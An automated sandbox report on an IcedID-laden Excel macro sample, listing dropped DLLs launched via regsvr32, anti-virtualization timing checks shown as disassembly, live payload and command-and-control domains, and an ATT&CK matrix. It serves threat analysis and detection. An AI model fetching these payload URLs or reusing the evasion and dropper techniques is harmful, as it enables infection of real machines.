          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Contains functionality to detect hardware virtualization (CPUID execution measurement)
          Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_02001E50
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\System32\regsvr32.exe; RDTSC instruction interceptor: First address: 0000000002001E71 second address: 0000000002001E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exe; RDTSC instruction interceptor: First address: 0000000002001EAB second address: 0000000002001EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_02002434 rdtsc
          Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_020027BC GetAdaptersInfo,GetAdaptersInfo
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmp; Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmp; Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
          Source: regsvr32.exe, 00000004.00000003.2092928788.000000000279D000.00000004.00000001.sdmp; Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
          Source: regsvr32.exe, 00000004.00000003.2092928788.000000000279D000.00000004.00000001.sdmp; Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
          Source: regsvr32.exe, 00000004.00000003.2092928788.000000000279D000.00000004.00000001.sdmp; Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
          Source: C:\Windows\System32\regsvr32.exe; Process information queried: ProcessInformation

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\regsvr32.exe; Domain query: astrocycle.download
          Source: C:\Windows\System32\regsvr32.exe; Domain query: aws.amazon.com
          Source: C:\Windows\System32\regsvr32.exe; Network Connect: 13.224.92.73 187
          Source: C:\Windows\System32\regsvr32.exe; Network Connect: 172.67.213.115 80
          Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_020022DC LookupAccountNameW

          Stealing of Sensitive Information:

          Yara detected IcedID
          Source: Yara match; File source: dump.pcap, type: PCAP
          Source: Yara match; File source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2904, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2904, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Scripting1 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery211 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Account Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting1 | NTDS | System Owner/User Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol124 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr321 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery22 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 444771
          Sample: HRScheduleH3965005.xlsm
          Startdate: 06/07/2021
          Architecture: WINDOWS
          Score: 100

          Sample-level signatures: Found malware configuration; Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 6 other signatures

          Process: EXCEL.EXE (started from the sample; graph counters 53 and 26)
          • DNS/IP: uppercilio.fun 172.67.146.88, 49169, 80 CLOUDFLARENETUS United States
          • DNS/IP: voopeople.fun 172.67.194.117, 49168, 80 CLOUDFLARENETUS United States
          • DNS/IP: thousandsyears.download 172.67.198.51, 49167, 80 CLOUDFLARENETUS United States
          • Dropped file: C:\Users\user\XTOWN.dll, PE32+
          • Dropped file: C:\Users\user\AppData\Local\...\lsdfik[1].fml, PE32+
          • Signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
          • Started processes: regsvr32.exe (graph node 11); regsvr32.exe (graph node 14, graph counter 4); regsvr32.exe (graph node 17)

          Process: regsvr32.exe (graph node 11)
          • Signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements

          Process: regsvr32.exe (graph node 14)
          • DNS/IP: astrocycle.download 172.67.213.115, 49171, 80 CLOUDFLARENETUS United States
          • DNS/IP: dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49170 AMAZON-02US United States
          • 2 other IPs or domains

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          Source | Detection | Scanner | Label
          astrocycle.download | 1% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
          http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
          https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom | 0% | URL Reputation | safe
          http://ocsp.rootg2.amazontrust.com08 | 0% | URL Reputation | safe
          https://www.buzzsprout.com; | 0% | Avira URL Cloud | safe
          http://voopeople.fun/div/44376,8555986111.jpg | 1% | Virustotal |
          http://voopeople.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
          http://crl.sca1b.amazontrust.com/sca1b.crl0 | 0% | URL Reputation | safe
          http://astrocycle.download/ | 1% | Virustotal |
          http://astrocycle.download/ | 0% | Avira URL Cloud | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
          http://crl.sca1b.amazontrust.com/sca1b.crl0g0- | 0% | Avira URL Cloud | safe
          http://ocsp.sca1b.amazontrust.com06 | 0% | URL Reputation | safe
          http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
          http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | URL Reputation | safe
          http://uppercilio.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
          http://crl.rootg2.amazo | 0% | Avira URL Cloud | safe
          http://o.ss2.us/0 | 0% | URL Reputation | safe
          https://prod-us-west-2.csp-report.marketing.aws.dev/submit | 0% | Avira URL Cloud | safe
          http://thousandsyears.download/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
          http://ocsp.entrust.net03 | 0% | URL Reputation | safe
          https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-101KGS0X8RKQZRM7QXQJNX-Content-Ty | 0% | Avira URL Cloud | safe
          http://crt.rootg2.amazontrust.com/rootg2.cer0= | 0% | URL Reputation | safe
          https://a0.awsstatic.com; | 0% | Avira URL Cloud | safe
          http://crt.sca1b.a | 0% | Avira URL Cloud | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          uppercilio.fun | 172.67.146.88 | true | false | | unknown
          thousandsyears.download | 172.67.198.51 | true | false | | unknown
          voopeople.fun | 172.67.194.117 | true | false | | unknown
          astrocycle.download | 172.67.213.115 | true | true | | unknown
          dr49lng3n1n2s.cloudfront.net | 13.224.92.73 | true | false | | high
          aws.amazon.com | unknown | unknown | false | | high

                    Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://voopeople.fun/div/44376,8555986111.jpg | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
          http://astrocycle.download/ | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
          http://uppercilio.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
          http://thousandsyears.download/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://twitter.com/awscloud | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://a0.awsstatic.com/libra/1.0.385/directories | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/terms/?nc1=f_pr | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://media.amazonwebservices.com | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/cn/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          https://a0.awsstatic.com/libra-css/images | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://a0.awsstatic.com/libra/1.0.385/librastandardlib | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://a0.awsstatic.com/psf/null | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://dts.podtrac.com | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/ar/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom | regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw | regsvr32.exe, 00000004.00000002.2098244987.000000000279D000.00000004.00000001.sdmp | false | | high
          https://pages.awscloud.com/communication-preferences?trk=homepage | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          http://ocsp.rootg2.amazontrust.com08 | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          https://aws.amazon.com/cn/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/ru/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://www.buzzsprout.com; | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
          https://aws.amazon.com/tw/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://i18n-string.us-west-2.prod.pricing.aws.a2z.com | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/ko/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/ru/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/es/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://crl.sca1b.amazontrust.com/sca1b.crl0 | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          https://docs.aws.amazon.com/index.html?nc2=h_ql_doc | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/ar/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2089228423.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096589121.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2097089458.0000000001C70000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
          https://aws.amazon.com/th/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://www.windows.com/pctv. | regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmp | false | | high
          https://a0.awsstatic.com/pricing-calculator/js/1.0.2 | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://crl.sca1b.amazontrust.com/sca1b.crl0g0- | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
          https://a0.awsstatic.com/plc/js/1.0.112/plc | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/marketplace/?nc2=h_mo | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://ocsp.sca1b.amazontrust.com06 | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          https://amazon.com/ | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | | high
          https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://console.aws.amazon.com/support/home/?nc2=h_ql_cu | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://crl.rootca1.amazontrust.com/rootca1.crl0 | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          https://aws.amazon.com/search/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/?nc2=h_lg | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://ocsp.rootca1.amazontrust.com0: | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
          https://console.aws.amazon.com/support/home/?nc1=f_dr | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/fr/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/vi/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://mktg-apac.s3-ap-southeast-1.amazonaws.com | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://www.twitch.tv/aws | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/marketplace/?nc2=h_ql_mp | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/search | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://a0.awsstatic.com/libra/1.0.385/libra-head.js | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          http://crl.rootg2.amazontrust.com/rootg2.crl0 | regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000004.00000002.2098394364.0000000002CA0000.00000002.00000001.sdmp | false | | high
          https://a0.awsstatic.com/da/js/1.0.47/aws-da.js | regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/tw/ | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/tr/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
          https://console.aws.amazon.com/?nc2=h_m_mc | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp | false | | high
          https://aws.amazon.com/fr/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | false | | high
                                                                                                                            http://crl.rootg2.amazoregsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://o.ss2.us/0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://aws.amazon.com/search/?searchQuery=regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://aws.amazon.com/privacy/?nc1=f_prregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://aws.amazon.com/pt/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://prod-us-west-2.csp-report.marketing.aws.dev/submitregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://aws.amazon.com/jp/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://aws.amazon.com/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.jsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-101KGS0X8RKQZRM7QXQJNX-Content-Tyregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://aws.amazon.com/jp/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crt.rootg2.amazontrust.com/rootg2.cer0=regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://aws.amazon.com/pt/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://aws.amazon.com/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.htmlregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://a0.awsstatic.com;regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            low
                                                                                                                                                            http://crt.sca1b.aregsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://aws.amazon.com/es/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.icra.org/vocabulary/.regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://d1.awsstatic.comregsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://aws.amazon.com/de/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://investor.msn.com/regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high

Contacted IPs


Public

IP               Domain                          Country         ASN     ASN Name           Malicious
172.67.198.51    thousandsyears.download         United States   13335   CLOUDFLARENETUS    false
